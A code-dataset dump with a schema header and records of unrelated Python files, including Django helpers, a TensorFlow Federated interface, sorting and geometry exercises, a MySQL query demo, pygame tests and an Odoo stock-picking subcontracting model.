blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
118e4b1974f84443f4a7aff55f59536929fc7f86
|
9f3b478d39f1a8b706813c1b4993614a376a045d
|
/pycryptics/utils/ngrams.py
|
f5b4948ad7ec29d344d4bdd141514be91e173c58
|
[
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
kod3r/cryptics
|
a201c62bdd2ecafee5937d2d7af9c29dcd38ec67
|
4bd17d24202b6fabce8c7ad378a61e77eb7562a7
|
refs/heads/master
| 2020-12-25T16:36:25.800144
| 2013-03-09T06:12:35
| 2013-03-09T06:12:35
| 10,188,553
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
import cPickle as pickle
import os.path
# Load pickled n-gram dictionaries from sequentially numbered data files.
# Files are expected in pairs: data/initial_ngrams.NN.pck and
# data/ngrams.NN.pck, numbered 00, 01, ... with no gaps.
INITIAL_NGRAMS = dict()
NGRAMS = dict()
i = 0
while True:
    # Stop at the first missing ngrams file. NOTE(review): only the ngrams
    # file's existence is checked — if the matching initial_ngrams file is
    # absent, the open() below raises; confirm the files always come in pairs.
    if os.path.exists('data/ngrams.%02d.pck' % i):
        with open('data/initial_ngrams.%02d.pck' % i, 'rb') as f:
            d = pickle.load(f)
        INITIAL_NGRAMS.update(d)
        with open('data/ngrams.%02d.pck' % i, 'rb') as f:
            d = pickle.load(f)
        NGRAMS.update(d)
        i += 1
    else:
        break
|
[
"robin.deits@gmail.com"
] |
robin.deits@gmail.com
|
6eead2339d7beb6299ea75b3f6f188d0abada27a
|
180ed6c8ff26b365e56c63d878a69c2e9d9b8c54
|
/code/Day_04/01_xml.py
|
e218c1a1a13919328e7e183d4d19d9fc0e95e7c4
|
[] |
no_license
|
archeranimesh/python_devu_in
|
9af46503b07f82a137d4b820920fa72f96a5067b
|
3d77e9e7b150aae15375b236e3de7f573da4bdce
|
refs/heads/master
| 2020-06-08T21:22:24.329530
| 2019-07-14T11:22:55
| 2019-07-14T11:22:55
| 193,308,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 447
|
py
|
# Read from XML.
import xml.etree.ElementTree as ET

file_path = r"code/Day_04/data_files/data.xml"
f = ET.parse(file_path)
print("type(f): ", type(f))
# get the root.
root = f.getroot()
print("type(root): ", type(root))
print("---" * 30)
# Walk every element of the tree in document order, dumping tag and text.
for element in root.iter():
    print(element.tag)
    print(element.text)
    print("---" * 5)
print("---" * 30)
# iterate over a column.
print("---" * 30)
for element in root.iter("Name"):
    print(element.text)
print("---" * 30)
|
[
"animeshb@archerimagine.com"
] |
animeshb@archerimagine.com
|
0d37212ad0a4f29125a824731a08f3d1111d8ae1
|
30e7173cd25d0c60bf3aecb009366c375e11411a
|
/articulos/templatetags/dict_key.py
|
a9144c06451ff0fe29b455948e58eb9ca08bbdd4
|
[] |
no_license
|
arm98sub/djangoHospital
|
55eb8ab437d1fb2036f55d9247d41fc577978e1e
|
bef771676b336d9b98f750e2e0648324cb259056
|
refs/heads/master
| 2023-05-17T14:39:54.510044
| 2021-06-01T23:36:06
| 2021-06-01T23:36:06
| 372,985,852
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
from django.template.defaultfilters import register


@register.filter(name='dict_key')
def dict_key(d, k):
    """Template filter: return d[str(k)]['cantidad'].

    Looks up *k* (coerced to str, since template dictionary keys here are
    strings) in *d* and returns the nested 'cantidad' value. Returns None
    for a missing key instead of raising AttributeError on None.get(...),
    so the template renders blank rather than failing with a 500.
    """
    entry = d.get(str(k))
    if entry is None:
        return None
    return entry.get('cantidad')
|
[
"vagrant@ubuntu1804.localdomain"
] |
vagrant@ubuntu1804.localdomain
|
cc30e097c5a8e1be0b554cb3c5dce3428c0620e4
|
4af59c0cd941f0ebe5f0ce447a4db90914585d23
|
/tensorflow_federated/python/core/impl/compiler/local_computation_factory_base.py
|
9297be8cd44edaf0ccebc7d3d4ab82a6af1935f9
|
[
"Apache-2.0"
] |
permissive
|
ali-yaz/federated
|
bbabac58c8a5e96f95cef2b7558f61c6a8610651
|
8e3d60ae6129611b5ebf8f94755c50082d97d45a
|
refs/heads/master
| 2023-03-10T21:19:43.160733
| 2021-02-23T09:11:10
| 2021-02-23T09:11:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,073
|
py
|
# Copyright 2021, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines the interface for factories of framework-specific computations."""
import abc
from tensorflow_federated.proto.v0 import computation_pb2 as pb
from tensorflow_federated.python.core.api import computation_types
class LocalComputationFactory(metaclass=abc.ABCMeta):
  """Interface for factories of backend framework-specific local computations.

  Implementations of this interface encapsulate the logic for constructing local
  computations that are executable on a particular type of backends (such as
  TensorFlow or XLA).
  """

  @abc.abstractmethod
  def create_constant_from_scalar(
      self, value, type_spec: computation_types.Type) -> pb.Computation:
    """Creates a TFF computation returning a constant based on a scalar value.

    The returned computation has the type signature `( -> T)`, where `T` may be
    either a scalar, or a nested structure made up of scalars.

    Args:
      value: A numpy scalar representing the value to return from the
        constructed computation (or to broadcast to all parts of a nested
        structure if `type_spec` is a structured type).
      type_spec: A `computation_types.Type` of the constructed constant. Must be
        either a tensor, or a nested structure of tensors.

    Returns:
      An instance of `pb.Computation` with semantics as described above.

    Raises:
      TypeError: if types don't match.
      ValueError: if the arguments are invalid.
    """
    # Abstract hook: concrete factories (TensorFlow, XLA, ...) must override.
    raise NotImplementedError
|
[
"tensorflow.copybara@gmail.com"
] |
tensorflow.copybara@gmail.com
|
fbb2860ca4221244c0a63770d79e6e96dac90529
|
3603f8f76ff81ea75bfc916888bdcfa55b7f12e4
|
/alds/alds1_6_c.py
|
ac675e72489195bfa0b40dd0da0ab01f62841d94
|
[] |
no_license
|
kimotot/aizu
|
4de0319959a3b166b8c2c4940ab7b701b6ee3395
|
315be1240cff733e1c6a7cd98942a95b3bd7ec96
|
refs/heads/master
| 2021-07-24T12:37:41.935302
| 2021-03-10T09:05:05
| 2021-03-10T09:05:05
| 91,927,321
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
def decode():
    """Read the deck from stdin.

    Returns (n, cards), where each card is a (suit, value, original_index)
    tuple; the input index is kept so stability can be checked after sorting.
    """
    n = int(input())
    cards = []
    for idx in range(n):
        suit, value = input().split()
        cards.append((suit, int(value), idx))
    return n, cards
def partition(a, p, r):
    """Lomuto partition of a[p..r] on card value; returns the pivot's final index."""
    pivot_value = a[r][1]
    boundary = p - 1
    for scan in range(p, r):
        if a[scan][1] <= pivot_value:
            boundary += 1
            a[boundary], a[scan] = a[scan], a[boundary]
    # Drop the pivot into its sorted slot just past the <= region.
    a[boundary + 1], a[r] = a[r], a[boundary + 1]
    return boundary + 1
def disp(cards):
    """Print each card as 'suit value', one per line."""
    for suit, value, _ in cards:
        print("{0} {1}".format(suit, value))
def quicksort(a, p, r):
    """Sort a[p..r] in place by card value (recursive quicksort)."""
    if p >= r:
        return
    pivot = partition(a, p, r)
    quicksort(a, p, pivot - 1)
    quicksort(a, pivot + 1, r)
def isstable(cards):
    """True if equal-valued cards kept their original input order."""
    for left, right in zip(cards, cards[1:]):
        if left[1] == right[1] and left[2] >= right[2]:
            return False
    return True
if __name__ == '__main__':
    # Read the deck, quicksort it by value, then report whether this
    # (inherently unstable) quicksort happened to preserve the input
    # order of equal-valued cards — AOJ ALDS1_6_C.
    n, cards = decode()
    quicksort(cards, 0, n-1)
    if isstable(cards):
        print("Stable")
    else:
        print("Not stable")
    disp(cards)
|
[
"god4bid@hear.to"
] |
god4bid@hear.to
|
5e3fbd7e68a9f9a546b5ab547039decf8d759b24
|
c50cf19707ecf44c8e15acf0e994d288fe4f01a7
|
/credit/admin.py
|
d27528df722953df4b3f2fcffcb8d2b79e4637f8
|
[
"MIT"
] |
permissive
|
JeremyParker/idlecars-backend
|
ee5981356c60161dee05c22e01e5c913e73083c0
|
819cce48e4679d61164b238b81dab0e4d51b8afa
|
refs/heads/master
| 2021-03-16T04:29:43.287760
| 2018-03-03T23:16:02
| 2018-03-03T23:16:02
| 31,734,223
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,074
|
py
|
# -*- encoding:utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from credit import models
class CustomerAdmin(admin.ModelAdmin):
    """Admin UI for credit Customers (referral codes and credit state)."""
    # Referral bookkeeping is system-managed: visible but never editable.
    readonly_fields = [
        'user',
        'invite_code',
        'invitor_code',
        'invitor_credited',
    ]
    list_display = [
        'user',
        'invitor_code',
        'invitor_credited',
        'invite_code',
        'app_credit',
    ]
    search_fields = [
        'user__username',
    ]

    def username(self, instance):
        # Convenience accessor exposing the related auth user's name.
        return instance.user.username
class CreditCodeAdmin(admin.ModelAdmin):
    """Admin UI for redeemable credit codes."""
    list_display = [
        'created_time',
        'description',
        'credit_code',
        'credit_amount',
        'invitor_credit_amount',
        'redeem_count',
        'expiry_time',
    ]
    search_fields = [
        'customer__user__username',
        'description',
        'credit_code',
    ]
    # Redemption count is derived from usage; not manually editable.
    readonly_fields = [
        'redeem_count',
    ]
# admin.site.register(models.CreditCode, CreditCodeAdmin)
# admin.site.register(models.Customer, CustomerAdmin)
|
[
"github@jeremyparker.org"
] |
github@jeremyparker.org
|
ec81c5347f900f5b8390d51c5ec6dc1d24fd7dd3
|
b29349323954d7a7036f56cef4139ed2c8fcb4f0
|
/scripts/color_sample.py
|
cbecd9d3b9924273ebb76deaaba6cd36e6b5d975
|
[
"MIT"
] |
permissive
|
JDevlieghere/dotfiles
|
e23098fb0241367764243531804c8b9f0ef41ac5
|
09fbb4369c2e54dd38c2566a283eb05864499068
|
refs/heads/main
| 2023-09-01T02:23:14.303513
| 2023-08-23T16:36:05
| 2023-08-23T16:36:05
| 39,687,300
| 336
| 123
|
MIT
| 2020-02-24T05:32:45
| 2015-07-25T13:52:36
|
Perl
|
UTF-8
|
Python
| false
| false
| 2,707
|
py
|
#!/usr/bin/python3
"""
usage: color_sample.py [-h] [file]
Color a call tree file generated by sample
positional arguments:
file sample file
optional arguments:
-h, --help show this help message and exit
"""
import re
import argparse
import fileinput
import bisect
# Markers delimiting the call-graph section of a `sample` report, and a
# regex capturing the leading sample count on each call-tree line.
END_MARKER = "Total number in stack"
BEGIN_MARKER = "Call graph:"
REGEX = re.compile(r"^\D*(\d+)")
def fg(r, g, b):
    """Return the ANSI escape that sets a 24-bit foreground color."""
    return f"\x1b[38;2;{r:d};{g:d};{b:d}m"
def reset():
    """Return the ANSI escape that resets terminal attributes."""
    return "\x1b[0m"
def rgb(minimum, maximum, value):
    """Map value in [minimum, maximum] onto a blue -> green -> red gradient."""
    assert value <= maximum
    assert value >= minimum
    lo, hi = float(minimum), float(maximum)
    # ratio runs 0..2 across the range: 0..1 fades blue out, 1..2 fades red in.
    ratio = 2 * (value - lo) / (hi - lo)
    blue = int(max(0, 255 * (1 - ratio)))
    red = int(max(0, 255 * (ratio - 1)))
    green = 255 - blue - red
    return red, green, blue
def binary_find(a, x):
    """Return the index of x in sorted list a, or -1 if absent."""
    pos = bisect.bisect_left(a, x)
    if pos < len(a) and a[pos] == x:
        return pos
    return -1
def get_all_samples(lines):
    """Return the distinct sample counts in the call-graph section, sorted."""
    in_graph = False
    counts = set()
    for line in lines:
        if BEGIN_MARKER in line:
            in_graph = True
            continue
        if END_MARKER in line:
            break
        if not in_graph:
            continue
        m = REGEX.match(line)
        if m:
            counts.add(int(m.group(1)))
    return sorted(counts)
def color(lines, all_samples):
    """Color the call tree based on the amount of samples for each branch."""
    minimum = 0
    maximum = len(all_samples)
    coloring = False
    for line in lines:
        if BEGIN_MARKER in line:
            coloring = True
        if END_MARKER in line:
            coloring = False
        # Lines outside the call-graph section pass through uncolored.
        if not coloring:
            print(line)
            continue
        match = re.match(REGEX, line)
        if not match:
            print(line)
            continue
        samples = int(match.group(1))
        # Use the rank of this count among all distinct counts, giving an
        # even color spread regardless of the counts' absolute values.
        value = binary_find(all_samples, samples)
        r, g, b = rgb(minimum, maximum, value)
        print(fg(r, g, b) + line + reset())
def main():
    """Color a call tree file generated by sample."""
    parser = argparse.ArgumentParser(
        description="Color a call tree file generated by sample"
    )
    parser.add_argument("file", nargs="?", help="sample file")
    args = parser.parse_args()
    # fileinput falls back to stdin when no file argument is given.
    with fileinput.input(args.file) as file:
        lines = []
        for line in file:
            lines.append(line.rstrip())
        # Two passes over the buffered lines: collect counts, then colorize.
        color(lines, get_all_samples(lines))


if __name__ == "__main__":
    main()
|
[
"jonas@devlieghere.com"
] |
jonas@devlieghere.com
|
ce580dc80f9d1e254df39bbd9c803c0514315380
|
ffaba5d94ea820281fee39be0841e3bf08ed157c
|
/setup.py
|
c3e69ea047bbcb8f389a65050e82f6fedcd67a85
|
[
"MIT"
] |
permissive
|
arruda/Twitter-Get-Old-Tweets-Scraper
|
d532e316ce013f94426bb9c999112c554b0f585f
|
6999a2c72df3866cb4a196370172c50b90b57e8d
|
refs/heads/master
| 2020-03-19T17:29:46.926370
| 2018-06-10T06:09:32
| 2018-06-10T06:09:32
| 136,762,748
| 1
| 1
|
MIT
| 2020-03-19T06:35:05
| 2018-06-09T22:35:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,202
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages

with open('README.md') as readme_file:
    readme = readme_file.read()
# NOTE(review): `readme` is read but never passed to setup() (no
# long_description argument) — confirm whether that is intended.

# Runtime dependencies: pyquery for HTML parsing, requests for HTTP.
requirements = [
    "pyquery>=1.2.17",
    "requests>=2.13.0",
]

# NOTE(review): both lists below are empty and unused by the setup() call.
setup_requirements = [ ]
test_requirements = [ ]

setup(
    author="Felipe Arruda",
    author_email='contato@arruda.blog.br',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'Natural Language :: English',
        "Programming Language :: Python :: 2",
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    # NOTE(review): this is the cookiecutter boilerplate text — presumably
    # it should describe the old-tweets scraper; confirm and update.
    description="Python Boilerplate contains all the boilerplate you need to create a Python package.",
    install_requires=requirements,
    include_package_data=True,
    name='old_tweets_crawler',
    packages=find_packages(include=['old_tweets_crawler*']),
    url='https://github.com/arruda/Twitter-Get-Old-Tweets-Scraper',
    version='0.1.0',
    zip_safe=False,
)
|
[
"felipe.arruda.pontes@gmail.com"
] |
felipe.arruda.pontes@gmail.com
|
09a6fa7f3033f4fb40be0af0bda8c23201095e4a
|
4d097d0e8c571874761463f698f5d34e38e549a0
|
/python/b_1002 터렛.py
|
dbb3151cd939c0f0d6da6eb38b86c8cf3d2fd6e3
|
[] |
no_license
|
sondongmin0419/study
|
533832151958fe8ae178d8aee183edf91ffa7e12
|
0c863e2c9111b35a15ccfaec3cc64828c584beb1
|
refs/heads/master
| 2023-03-24T11:54:04.139399
| 2021-03-15T13:40:21
| 2021-03-15T13:40:21
| 281,695,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
import sys
input = sys.stdin.readline

# Baekjoon 1002 "Turret": count intersection points of two circles
# centered at the turret positions with radii equal to the measured
# distances. Answers: -1 (infinite), 0, 1 (tangent), or 2.
n = int(input())
for TC in range(n):
    x1, y1, r1, x2, y2, r2 = map(int, input().rstrip().split())
    # Compare squared distances so every test stays in exact integer
    # arithmetic. The original computed sqrt(...) and used float `==`,
    # which can misclassify tangent circles due to rounding error.
    dist_sq = (x2 - x1) ** 2 + (y2 - y1) ** 2
    sum_sq = (r1 + r2) ** 2          # externally tangent threshold
    diff_sq = (r1 - r2) ** 2         # internally tangent threshold
    if x1 == x2 and y1 == y2:
        # Concentric: infinitely many common points iff radii are equal.
        if r1 == r2:
            print(-1)
        else:
            print(0)
    elif dist_sq == sum_sq or dist_sq == diff_sq:
        # Externally or internally tangent: exactly one common point.
        print(1)
    elif dist_sq > sum_sq or dist_sq < diff_sq:
        # Too far apart, or one circle strictly inside the other.
        print(0)
    else:
        print(2)
|
[
"dongmin.dev0419@gmail.com"
] |
dongmin.dev0419@gmail.com
|
eb6166eec43fe151d8738787a51a433ff70d1972
|
5b9f7edaf22297d0d6d0239135f1b2484fd24b34
|
/module07.mysql.with.python/exercise08.py
|
9aad91a512ff126d042535a8a26bd58f3cb5c995
|
[
"MIT"
] |
permissive
|
deepcloudlabs/dcl162-2020-sep-02
|
925791b5c7adae8263e82a3c9a6a406d0b68eb0e
|
abd21c59d89985e9f5922df65fd1a5ccab019de4
|
refs/heads/master
| 2022-12-12T16:10:58.497846
| 2020-09-04T18:16:06
| 2020-09-04T18:16:06
| 291,666,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
import mysql.connector
# Connect to the local MySQL sample 'world' database.
# NOTE(review): hard-coded root credentials — acceptable only for a lab
# exercise, never in production code.
my_connection = mysql.connector.connect(host="localhost", user="root", password="Secret_123", database="world")
my_cursor = my_connection.cursor()
# Capital city of each country: country.capital joins to city.id; first 10 rows.
sql = "select ctry.name, city.name from country as ctry inner join city as city on ctry.capital = city.id limit 10"
my_cursor.execute(sql)
result_set = my_cursor.fetchall()
for row in result_set:
    print(row)
|
[
"deepcloudlabs@gmail.com"
] |
deepcloudlabs@gmail.com
|
8439d19170cf896f5580caa519a737b1e0e12471
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/o11_j200739+544516/sdB_O11_J200739+544516_lc.py
|
c712c7ed5a3afda832ff3ba22080131102af8479
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
from gPhoton.gAperture import gAperture

def main():
    """Extract a GALEX NUV aperture-photometry light curve for sdB O11 J200739+544516."""
    # NOTE(review): the csvfile path contains a space before the final '/'
    # ("...544516 /sdB_..."); this looks like a generation artifact —
    # confirm the intended output location before running.
    gAperture(band="NUV", skypos=[301.9125,54.754444], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_O11_J200739+544516 /sdB_O11_J200739+544516_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)

if __name__ == "__main__":
    main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
44a88ef6c47660f70db2f79b8fdd1d06f0611b66
|
875b9c5093efd688f79fada905bee80c42380ec1
|
/tests/test_pygame_player.py
|
20237226009ceb731a7dd5490eed46043acf0029
|
[
"MIT"
] |
permissive
|
chaheeee/PyGamePlayer
|
945e64819b3e862757e1bf9dbf622ac844f6dbed
|
430ced572eddcd638a2db5eb906e5f2016ac7250
|
refs/heads/master
| 2023-02-21T19:42:18.229341
| 2021-01-22T02:22:52
| 2021-01-22T02:22:52
| 330,974,347
| 0
| 0
|
MIT
| 2021-01-21T15:05:27
| 2021-01-19T12:35:22
|
Python
|
UTF-8
|
Python
| false
| false
| 3,064
|
py
|
import time
import pygame
from unittest import TestCase
from pygame_player import PyGamePlayer
class DummyPyGamePlayer(PyGamePlayer):
    """Minimal concrete PyGamePlayer for tests: presses no keys, zero reward."""

    def __init__(self, force_game_fps=10, run_real_time=False):
        super(DummyPyGamePlayer, self).__init__(force_game_fps=force_game_fps, run_real_time=run_real_time)

    def get_keys_pressed(self, screen_array, feedback, terminal):
        # Press nothing.
        pass

    def get_feedback(self):
        # (reward, terminal): no reward, never terminal.
        return 0.0, False
class TestPyGamePlayer(TestCase):
    """Tests for PyGamePlayer's interception of pygame display/event calls."""
    # Tiny 1x1 display keeps each test cheap.
    DISPLAY_X = 1
    DISPLAY_Y = 1

    def setUp(self):
        pygame.init()
        pygame.display.set_mode((self.DISPLAY_X, self.DISPLAY_Y), 0, 32)

    def tearDown(self):
        pygame.quit()

    def test_restores_pygame_methods_after_exit(self):
        pygame_flip, pygame_update, pygame_event = pygame.display.flip, pygame.display.update, pygame.event.get
        with PyGamePlayer():
            # methods should be replaced
            self.assertNotEqual(pygame_flip, pygame.display.flip)
            self.assertNotEqual(pygame_update, pygame.display.update)
            self.assertNotEqual(pygame_event, pygame.event.get)
        # original methods should be restored
        self.assertEqual(pygame_flip, pygame.display.flip)
        self.assertEqual(pygame_update, pygame.display.update)
        self.assertEqual(pygame_event, pygame.event.get)

    def test_fixing_frames_per_second(self):
        fix_fps_to = 3
        with DummyPyGamePlayer(force_game_fps=fix_fps_to):
            clock = pygame.time.Clock()
            start_time_ms = clock.get_time()
            # One update per forced frame should advance exactly one second.
            for _ in range(fix_fps_to):
                pygame.display.update()
            end_time_ms = clock.get_time()
            self.assertAlmostEqual(end_time_ms - start_time_ms, 1000.0,
                                   msg='Expected only 1000 milliseconds to have passed on the clock after screen updates')

    def test_get_keys_pressed_method_sets_event_get(self):
        fixed_key_pressed = 24

        class FixedKeysReturned(DummyPyGamePlayer):
            def get_keys_pressed(self, screen_array, feedback, terminal):
                return [fixed_key_pressed]

        with FixedKeysReturned():
            pygame.display.update()
            key_pressed = pygame.event.get()
            self.assertEqual(key_pressed[0].key, fixed_key_pressed)

    def test_get_screen_buffer(self):
        # inner_self is the player; `self` (closure) is the test case.
        class TestScreenArray(DummyPyGamePlayer):
            def get_keys_pressed(inner_self, screen_array, feedback, terminal):
                self.assertEqual(screen_array.shape[0], self.DISPLAY_X)
                self.assertEqual(screen_array.shape[1], self.DISPLAY_Y)

        with TestScreenArray():
            pygame.display.update()

    def test_run_real_time(self):
        fix_fps_to = 3
        with PyGamePlayer(force_game_fps=fix_fps_to, run_real_time=True):
            start = time.time()
            clock = pygame.time.Clock()
            # run_real_time should throttle even an absurd tick rate.
            for _ in range(fix_fps_to):
                clock.tick(42343)
            end = time.time()
            self.assertAlmostEqual(end-start, 1.0, delta=0.1)
|
[
"danielslaterishere@gmail.com"
] |
danielslaterishere@gmail.com
|
5171ac07d2be35016805b504c4184d500421005d
|
045cb1a5638c3575296f83471758dc09a8065725
|
/addons/mrp_subcontracting/models/stock_picking.py
|
34f266a39dd33ebb2f957f12845bc85be08de33c
|
[] |
no_license
|
marionumza/saas
|
7236842b0db98d1a0d0c3c88df32d268509629cb
|
148dd95d991a348ebbaff9396759a7dd1fe6e101
|
refs/heads/main
| 2023-03-27T14:08:57.121601
| 2021-03-20T07:59:08
| 2021-03-20T07:59:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,173
|
py
|
# -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from datetime import timedelta
from harpiya import api, fields, models
class StockPicking(models.Model):
    """Extends stock.picking with MRP subcontracting behaviour."""
    _inherit = 'stock.picking'

    # True when the "Record Components" button should be visible on the form.
    display_action_record_components = fields.Boolean(compute='_compute_display_action_record_components')

    @api.depends('state')
    def _compute_display_action_record_components(self):
        """Show the record-components action only for in-progress subcontracted
        receipts whose components are tracked and whose MO is still open."""
        for picking in self:
            # Hide if not encoding state
            if picking.state in ('draft', 'cancel', 'done'):
                picking.display_action_record_components = False
                continue
            if not picking._is_subcontract():
                picking.display_action_record_components = False
                continue
            # Hide if no components are tracked
            subcontracted_productions = picking._get_subcontracted_productions()
            subcontracted_moves = subcontracted_productions.mapped('move_raw_ids')
            if all(subcontracted_move.has_tracking == 'none' for subcontracted_move in subcontracted_moves):
                picking.display_action_record_components = False
                continue
            # Hide if the production is to close
            if not subcontracted_productions.filtered(lambda mo: mo.state not in ('to_close', 'done')):
                picking.display_action_record_components = False
                continue
            picking.display_action_record_components = True

    # -------------------------------------------------------------------------
    # Action methods
    # -------------------------------------------------------------------------
    def action_done(self):
        """Validate the picking, then produce/close the subcontracting MOs that
        feed each subcontracted receipt move."""
        res = super(StockPicking, self).action_done()
        productions = self.env['mrp.production']
        for picking in self:
            for move in picking.move_lines:
                if not move.is_subcontract:
                    continue
                production = move.move_orig_ids.production_id
                if move._has_tracked_subcontract_components():
                    # Tracked components: mirror the receipt's move lines onto
                    # the MO's still-open finished moves.
                    move.move_orig_ids.filtered(lambda m: m.state not in ('done', 'cancel')).move_line_ids.unlink()
                    move_finished_ids = move.move_orig_ids.filtered(lambda m: m.state not in ('done', 'cancel'))
                    for ml in move.move_line_ids:
                        ml.copy({
                            'picking_id': False,
                            'production_id': move_finished_ids.production_id.id,
                            'move_id': move_finished_ids.id,
                            'qty_done': ml.qty_done,
                            'result_package_id': False,
                            'location_id': move_finished_ids.location_id.id,
                            'location_dest_id': move_finished_ids.location_dest_id.id,
                        })
                else:
                    # Untracked components: auto-produce the MO line by line
                    # through the produce wizard model.
                    for move_line in move.move_line_ids:
                        produce = self.env['mrp.product.produce'].with_context(default_production_id=production.id).create({
                            'production_id': production.id,
                            'qty_producing': move_line.qty_done,
                            'product_uom_id': move_line.product_uom_id.id,
                            'finished_lot_id': move_line.lot_id.id,
                            'consumption': 'strict',
                        })
                        produce._generate_produce_lines()
                        produce._record_production()
                productions |= production
            for subcontracted_production in productions:
                if subcontracted_production.state == 'progress':
                    subcontracted_production.post_inventory()
                else:
                    subcontracted_production.button_mark_done()
                # For consistency, set the date on production move before the date
                # on picking. (Traceability report + Product Moves menu item)
                minimum_date = min(picking.move_line_ids.mapped('date'))
                production_moves = subcontracted_production.move_raw_ids | subcontracted_production.move_finished_ids
                production_moves.write({'date': minimum_date - timedelta(seconds=1)})
                production_moves.move_line_ids.write({'date': minimum_date - timedelta(seconds=1)})
        return res

    def action_record_components(self):
        """Open component recording for the first receipt move with tracked
        subcontracted components whose MO still accepts input."""
        self.ensure_one()
        for move in self.move_lines:
            if not move._has_tracked_subcontract_components():
                continue
            production = move.move_orig_ids.production_id
            if not production or production.state in ('done', 'to_close'):
                continue
            return move._action_record_components()

    # -------------------------------------------------------------------------
    # Subcontract helpers
    # -------------------------------------------------------------------------
    def _is_subcontract(self):
        # Incoming picking with at least one subcontracted move.
        self.ensure_one()
        return self.picking_type_id.code == 'incoming' and any(m.is_subcontract for m in self.move_lines)

    def _get_subcontracted_productions(self):
        self.ensure_one()
        return self.move_lines.mapped('move_orig_ids.production_id')

    def _get_warehouse(self, subcontract_move):
        return subcontract_move.warehouse_id or self.picking_type_id.warehouse_id

    def _prepare_subcontract_mo_vals(self, subcontract_move, bom):
        """Build the create() values for the subcontracting MO of one move."""
        subcontract_move.ensure_one()
        group = self.env['procurement.group'].create({
            'name': self.name,
            'partner_id': self.partner_id.id,
        })
        product = subcontract_move.product_id
        warehouse = self._get_warehouse(subcontract_move)
        vals = {
            'company_id': subcontract_move.company_id.id,
            'procurement_group_id': group.id,
            'product_id': product.id,
            'product_uom_id': subcontract_move.product_uom.id,
            'bom_id': bom.id,
            # Both source and destination are the partner's subcontractor
            # location: the MO happens "at" the subcontractor.
            'location_src_id': subcontract_move.picking_id.partner_id.with_context(force_company=subcontract_move.company_id.id).property_stock_subcontractor.id,
            'location_dest_id': subcontract_move.picking_id.partner_id.with_context(force_company=subcontract_move.company_id.id).property_stock_subcontractor.id,
            'product_qty': subcontract_move.product_uom_qty,
            'picking_type_id': warehouse.subcontracting_type_id.id
        }
        return vals

    def _subcontracted_produce(self, subcontract_details):
        """Create, confirm and reserve one MO per (move, bom) pair, linking
        its finished move to the receipt move."""
        self.ensure_one()
        for move, bom in subcontract_details:
            mo = self.env['mrp.production'].with_context(force_company=move.company_id.id).create(self._prepare_subcontract_mo_vals(move, bom))
            self.env['stock.move'].create(mo._get_moves_raw_values())
            mo.action_confirm()
            # Link the finished to the receipt move.
            finished_move = mo.move_finished_ids.filtered(lambda m: m.product_id == move.product_id)
            finished_move.write({'move_dest_ids': [(4, move.id, False)]})
